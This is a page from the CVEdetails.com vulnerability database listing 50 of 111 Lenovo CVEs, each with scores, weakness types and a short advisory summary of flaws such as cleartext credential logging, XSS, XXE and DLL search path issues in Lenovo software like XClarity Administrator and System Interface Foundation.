CVEdetails.com the ultimate security vulnerability data source
(e.g.: CVE-2009-1234 or 2010-1234 or 20101234)
Log In   Register
Vulnerability Feeds & WidgetsNew   www.itsecdb.com  

Lenovo : Security Vulnerabilities

Press ESC to close
# CVE ID CWE ID # of Exploits Vulnerability Type(s) Publish Date Update Date Score Gained Access Level Access Complexity Authentication Conf. Integ. Avail.
1 CVE-2021-3417 319 2021-03-09 2021-03-15
4.0
None Remote Low ??? Partial None None
An internal product security audit of LXCO, prior to version 1.2.2, discovered that credentials for Lenovo XClarity Administrator (LXCA), if added as a Resource Manager, are encoded then written to an internal LXCO log file each time a session is established with LXCA. Affected logs are captured in the First Failure Data Capture (FFDC) service log. The FFDC service log is only generated when requested by a privileged LXCO user and it is only accessible to the privileged LXCO user that requested the file.
2 CVE-2020-8357 276 DoS 2021-03-09 2021-03-12
2.1
None Local Low Not required None None Partial
A denial of service vulnerability was reported in Lenovo PCManager, prior to version 3.0.200.2042, that could allow configuration files to be written to non-standard locations.
3 CVE-2020-8356 319 2021-03-09 2021-03-15
4.0
None Remote Low ??? Partial None None
An internal product security audit of LXCO, prior to version 1.2.2, discovered that optional passwords, if specified, for the Syslog and SMTP forwarders are written to an internal LXCO log file in clear text. Affected logs are captured in the First Failure Data Capture (FFDC) service log. The FFDC service log is only generated when requested by a privileged LXCO user and it is only accessible to the privileged LXCO user that requested the file.
4 CVE-2020-8355 319 2021-02-10 2021-02-17
4.0
None Remote Low ??? Partial None None
An internal product security audit of Lenovo XClarity Administrator (LXCA) prior to version 3.1.0 discovered the Windows OS credentials provided by the LXCA user to perform driver updates of managed systems may be captured in the First Failure Data Capture (FFDC) service log if the service log is generated while managed endpoints are updating. The service log is only generated when requested by a privileged LXCA user and it is only accessible to the privileged LXCA user that requested the file and is then deleted.
5 CVE-2020-8351 269 Exec Code 2020-11-30 2020-12-02
4.6
None Local Low Not required Partial Partial Partial
A privilege escalation vulnerability was reported in Lenovo PCManager prior to version 3.0.50.9162 that could allow an authenticated user to execute code with elevated privileges.
6 CVE-2020-8348 79 Exec Code XSS 2020-09-24 2020-09-30
4.3
None Remote Medium Not required None Partial None
A DOM-based cross-site scripting (XSS) vulnerability was reported in Lenovo Enterprise Network Disk prior to version 6.1 patch 6 hotfix 4 that could allow execution of code in an authenticated user's current browser session if a crafted url is visited, possibly through phishing.
7 CVE-2020-8347 79 Exec Code XSS 2020-09-24 2020-09-30
4.3
None Remote Medium Not required None Partial None
A reflective cross-site scripting (XSS) vulnerability was reported in Lenovo Enterprise Network Disk prior to version 6.1 patch 6 hotfix 4 that could allow execution of code in an authenticated user's browser if a crafted url is visited, possibly through phishing.
8 CVE-2020-8346 276 DoS 2020-09-15 2020-09-21
2.1
None Local Low Not required None None Partial
A denial of service vulnerability was reported in the Lenovo Vantage component called Lenovo System Interface Foundation prior to version 1.1.19.5 that could allow configuration files to be written to non-standard locations.
9 CVE-2020-8345 427 2020-10-14 2020-10-26
4.4
None Local Medium Not required Partial Partial Partial
A DLL search path vulnerability was reported in the Lenovo HardwareScan Plugin for the Lenovo Vantage hardware scan feature prior to version 1.0.46.11 that could allow escalation of privilege.
10 CVE-2020-8342 367 2020-09-15 2020-09-21
6.9
None Local Medium Not required Complete Complete Complete
A race condition vulnerability was reported in Lenovo System Update prior to version 5.07.0106 that could allow escalation of privilege.
11 CVE-2020-8338 426 Exec Code 2020-10-14 2020-10-16
7.2
None Local Low Not required Complete Complete Complete
A DLL search path vulnerability was reported in Lenovo Diagnostics prior to version 4.35.4 that could allow a user with local access to execute code on the system.
12 CVE-2020-8327 269 Exec Code 2020-04-14 2020-04-15
7.2
None Local Low Not required Complete Complete Complete
A privilege escalation vulnerability was reported in LenovoBatteryGaugePackage for Lenovo System Interface Foundation bundled in Lenovo Vantage prior to version 10.2003.10.0 that could allow an authenticated user to execute code with elevated privileges.
13 CVE-2020-8326 428 Exec Code 2020-07-24 2020-07-29
6.9
None Local Medium Not required Complete Complete Complete
An unquoted service path vulnerability was reported in Lenovo Drivers Management prior to version 2.7.1128.1046 that could allow an authenticated user to execute code with elevated privileges.
14 CVE-2020-8324 20 2020-04-14 2020-04-15
2.1
None Local Low Not required None Partial None
A vulnerability was reported in LenovoAppScenarioPluginSystem for Lenovo System Interface Foundation prior to version 1.2.184.31 that could allow unsigned DLL files to be executed.
15 CVE-2020-8319 269 Exec Code 2020-04-14 2020-04-15
7.2
None Local Low Not required Complete Complete Complete
A privilege escalation vulnerability was reported in Lenovo System Interface Foundation prior to version 1.1.19.3 that could allow an authenticated user to execute code with elevated privileges.
16 CVE-2020-8318 269 Exec Code 2020-04-14 2020-04-15
7.2
None Local Low Not required Complete Complete Complete
A privilege escalation vulnerability was reported in the LenovoSystemUpdatePlugin for Lenovo System Interface Foundation prior to version that could allow an authenticated user to execute code with elevated privileges.
17 CVE-2020-8317 426 Exec Code 2020-07-24 2020-07-29
6.9
None Local Medium Not required Complete Complete Complete
A DLL search path vulnerability was reported in Lenovo Drivers Management prior to version 2.7.1128.1046 that could allow an authenticated user to execute code with elevated privileges.
18 CVE-2020-8316 200 +Info 2020-04-14 2020-04-15
2.1
None Local Low Not required Partial None None
A vulnerability was reported in Lenovo Vantage prior to version 10.2003.10.0 that could allow an authenticated user to read files on the system with elevated privileges.
19 CVE-2019-19757 79 Exec Code XSS 2020-02-14 2020-02-24
3.5
None Remote Medium ??? None Partial None
An internal product security audit of Lenovo XClarity Administrator (LXCA) discovered a Document Object Model (DOM) based cross-site scripting vulnerability in versions prior to 2.6.6 that could allow JavaScript code to be executed in the user's web browser if a specially crafted link is visited. The JavaScript code is executed on the user's system, not executed on LXCA itself.
20 CVE-2019-19756 532 2020-03-13 2020-03-18
3.6
None Local Low Not required Partial Partial None
An internal product security audit of Lenovo XClarity Administrator (LXCA) discovered Windows OS credentials, used to perform driver updates of managed systems, being written to a log file in clear text. This only affects LXCA version 2.6.0 when performing a Windows driver update. Affected logs are only accessible to authorized users in the First Failure Data Capture (FFDC) service log and log files on LXCA.
21 CVE-2019-6196 426 2020-06-09 2020-06-22
6.9
None Local Medium Not required Complete Complete Complete
A symbolic link vulnerability in some Lenovo installation packages, prior to version 1.2.9.3, could allow privileged file operations during file extraction and installation.
22 CVE-2019-6194 611 2020-02-14 2020-02-21
4.3
None Remote Medium Not required Partial None None
An XML External Entity (XXE) processing vulnerability was reported in Lenovo XClarity Administrator (LXCA) versions prior to 2.6.6 that could allow information disclosure.
23 CVE-2019-6193 200 +Info 2020-02-14 2020-02-24
5.0
None Remote Low Not required Partial None None
An information disclosure vulnerability was reported in Lenovo XClarity Administrator (LXCA) versions prior to 2.6.6 that could allow unauthenticated access to some configuration files which may contain usernames, license keys, IP addresses, and encrypted password hashes.
24 CVE-2019-6191 2019-11-20 2020-08-24
4.6
None Local Low Not required Partial Partial Partial
A potential vulnerability in the discontinued LenovoPaper software version 1.0.0.22 may allow local privilege escalation.
25 CVE-2019-6189 426 2019-11-20 2019-11-22
4.4
None Local Medium Not required Partial Partial Partial
A potential vulnerability was reported in Lenovo System Interface Foundation versions before v1.1.18.3 that could allow an administrative user to load an unsigned DLL.
26 CVE-2019-6186 Exec Code 2019-11-20 2019-11-22
6.5
None Remote Low ??? Partial Partial Partial
A potential vulnerability was reported in Lenovo System Interface Foundation versions before v1.1.18.3 that could allow an authenticated user to execute code as another user.
27 CVE-2019-6184 2019-11-20 2020-08-24
4.6
None Local Low Not required Partial Partial Partial
A potential vulnerability in the discontinued Customer Engagement Service (CCSDK) software version 2.0.21.1 may allow local privilege escalation.
28 CVE-2019-6183 DoS 2019-12-10 2020-08-24
7.8
None Remote Low Not required None None Complete
A denial of service vulnerability has been reported in Lenovo Energy Management Driver for Windows 10 versions prior to 15.11.29.7 that could cause systems to experience a blue screen error. Lenovo Energy Management is a client utility. Lenovo XClarity Energy Manager is not affected.
29 CVE-2019-6182 1236 2019-09-03 2020-08-24
4.0
None Remote Low ??? None Partial None
A stored CSV Injection vulnerability was reported in Lenovo XClarity Administrator (LXCA) versions prior to 2.5.0 that could allow an administrative user to store malformed data in LXCA Jobs and Event Log data, that could result in crafted formulas stored in an exported CSV file. The crafted formula is not executed on LXCA itself.
30 CVE-2019-6181 79 Exec Code XSS 2019-09-03 2019-10-09
4.3
None Remote Medium Not required None Partial None
A reflected cross-site scripting (XSS) vulnerability was reported in Lenovo XClarity Administrator (LXCA) versions prior to 2.5.0 that could allow a crafted URL, if visited, to cause JavaScript code to be executed in the user's web browser. The JavaScript code is not executed on LXCA itself.
31 CVE-2019-6180 79 Exec Code XSS 2019-09-03 2019-10-09
3.5
None Remote Medium ??? None Partial None
A stored cross-site scripting (XSS) vulnerability was reported in Lenovo XClarity Administrator (LXCA) versions prior to 2.5.0 that could allow an administrative user to cause JavaScript code to be stored in LXCA which may then be executed in the user's web browser. The JavaScript code is not executed on LXCA itself.
32 CVE-2019-6179 611 2019-09-03 2019-10-09
5.0
None Remote Low Not required Partial None None
An XML External Entity (XXE) processing vulnerability was reported in Lenovo XClarity Administrator (LXCA) prior to version 2.5.0 , Lenovo XClarity Integrator (LXCI) for Microsoft System Center prior to version 7.7.0, and Lenovo XClarity Integrator (LXCI) for VMWare vCenter prior to version 6.1.0 that could allow information disclosure.
33 CVE-2019-6177 200 +Info 2019-08-21 2019-10-09
7.5
None Remote Low Not required Partial Partial Partial
A vulnerability reported in Lenovo Solution Center version 03.12.003, which is no longer supported, could allow log files to be written to non-standard locations, potentially leading to privilege escalation. Lenovo ended support for Lenovo Solution Center and recommended that customers migrate to Lenovo Vantage or Lenovo Diagnostics in April 2018.
34 CVE-2019-6175 DoS 2019-09-26 2020-08-24
7.8
None Remote Low Not required None None Complete
A denial of service vulnerability was reported in Lenovo System Update versions prior to 5.07.0088 that could allow configuration files to be written to non-standard locations.
35 CVE-2019-6173 426 2020-06-09 2020-06-22
6.9
None Local Medium Not required Complete Complete Complete
A DLL search path vulnerability could allow privilege escalation in some Lenovo installation packages, prior to version 1.2.9.3, during installation if an attacker already has administrative privileges.
36 CVE-2019-6158 532 2019-05-03 2019-10-09
4.3
None Remote Medium Not required Partial None None
An internal product security audit of Lenovo XClarity Administrator (LXCA) discovered HTTP proxy credentials being written to a log file in clear text. This only affects LXCA when HTTP proxy credentials have been configured. This affects LXCA versions 2.0.0 to 2.3.x.
37 CVE-2018-16097 434 2018-11-30 2018-12-28
4.0
None Remote Low ??? None Partial None
LXCI for VMware versions prior to 5.5 and LXCI for Microsoft System Center versions prior to 3.5, allow an authenticated user to write to any system file due to insufficient sanitization during the upload of a certificate.
38 CVE-2018-16093 434 2018-11-30 2018-12-28
4.0
None Remote Low ??? None Partial None
In versions prior to 5.5, LXCI for VMware allows an authenticated user to write to any system file due to insufficient sanitization during the upload of a backup file.
39 CVE-2018-12169 287 Bypass 2018-09-21 2018-12-20
4.6
None Local Low Not required Partial Partial Partial
Platform sample code firmware in 4th Generation Intel Core Processor, 5th Generation Intel Core Processor, 6th Generation Intel Core Processor, 7th Generation Intel Core Processor and 8th Generation Intel Core Processor contains a logic error which may allow physical attacker to potentially bypass firmware authentication.
40 CVE-2018-9072 20 2018-11-30 2018-12-28
4.0
None Remote Low ??? Partial None None
In versions prior to 5.5, LXCI for VMware allows an authenticated user to download any system file due to insufficient input sanitization during file downloads.
41 CVE-2018-9070 2018-07-13 2019-10-03
6.9
None Local Medium Not required Complete Complete Complete
For the Lenovo Smart Assistant Android app versions earlier than 12.1.82, an attacker with physical access to the smart speaker can, by pressing a specific button sequence, enter factory test mode and enable a web service intended for testing the device. As with most test modes, this provides extra privileges, including changing settings and running code. Lenovo Smart Assistant is an Amazon Alexa-enabled smart speaker developed by Lenovo.
42 CVE-2018-9067 2018-07-13 2019-10-03
5.0
None Remote Low Not required Partial None None
The Lenovo Help Android app versions earlier than 6.1.2.0327 had insufficient access control for some functions which, if exploited, could have led to exposure of approximately 400 email addresses and 8,500 IMEI.
43 CVE-2018-9066 20 Exec Code 2018-07-30 2019-10-03
9.0
None Remote Low ??? Complete Complete Complete
In Lenovo xClarity Administrator versions earlier than 2.1.0, an authenticated LXCA user can, under specific circumstances, inject additional parameters into a specific web API call which can result in privileged command execution within LXCA's underlying operating system.
44 CVE-2018-9065 312 2018-07-30 2019-10-03
3.5
None Remote Medium ??? Partial None None
In Lenovo xClarity Administrator versions earlier than 2.1.0, an attacker that gains access to the underlying LXCA file system user may be able to retrieve a credential store containing the service processor user names and passwords for servers previously managed by that LXCA instance, and potentially decrypt those credentials more easily than intended.
45 CVE-2018-9064 2018-07-30 2019-10-03
4.0
None Remote Low ??? Partial None None
In Lenovo xClarity Administrator versions earlier than 2.1.0, an authenticated LXCA user may abuse a web API debug call to retrieve the credentials for the System Manager user.
46 CVE-2018-9063 119 Exec Code Overflow 2018-05-04 2018-06-13
4.6
None Local Low Not required Partial Partial Partial
MapDrv (C:\Program Files\Lenovo\System Update\mapdrv.exe) In Lenovo System Update versions earlier than 5.07.0072 contains a local vulnerability where an attacker entering very large user ID or password can overrun the program's buffer, causing undefined behaviors, such as execution of arbitrary code. No additional privilege is granted to the attacker beyond what is already possessed to run MapDrv.
47 CVE-2017-17833 119 Exec Code Overflow Mem. Corr. 2018-04-23 2020-05-15
7.5
None Remote Low Not required Partial Partial Partial
OpenSLP releases in the 1.0.2 and 1.1.0 code streams have a heap-related memory corruption issue which may manifest itself as a denial-of-service or a remote code-execution vulnerability.
48 CVE-2017-3776 200 +Info 2018-04-19 2018-05-22
5.0
None Remote Low Not required Partial None None
Lenovo Help Android mobile app versions earlier than 6.1.2.0327 allowed information to be transmitted over an HTTP channel, permitting others observing the channel to potentially see this information.
49 CVE-2017-3770 Exec Code 2017-09-22 2019-10-03
6.5
None Remote Low ??? Partial Partial Partial
Privilege escalation vulnerability in LXCA versions earlier than 1.3.2 where an authenticated user may be able to abuse certain web interface functionality to execute privileged commands within the underlying LXCA operating system.
50 CVE-2017-3764 200 +Info 2017-11-30 2017-12-20
5.0
None Remote Low Not required Partial None None
A vulnerability was identified in Lenovo XClarity Administrator (LXCA) before 1.4.0 where LXCA user account names may be exposed to unauthenticated users with access to the LXCA web user interface. No password information of the user accounts is exposed.
Total number of vulnerabilities : 111   Page : 1 (This Page)2 3
CVE is a registred trademark of the MITRE Corporation and the authoritative source of CVE content is MITRE's CVE web site. CWE is a registred trademark of the MITRE Corporation and the authoritative source of CWE content is MITRE's CWE web site. OVAL is a registered trademark of The MITRE Corporation and the authoritative source of OVAL content is MITRE's OVAL web site.
Use of this information constitutes acceptance for use in an AS IS condition. There are NO warranties, implied or otherwise, with regard to this information or its use. Any use of this information is at the user's risk. It is the responsibility of user to evaluate the accuracy, completeness or usefulness of any information, opinion, advice or other content. EACH USER WILL BE SOLELY RESPONSIBLE FOR ANY consequences of his or her direct or indirect use of this web site. ALL WARRANTIES OF ANY KIND ARE EXPRESSLY DISCLAIMED. This site will NOT BE LIABLE FOR ANY DIRECT, INDIRECT or any other kind of loss.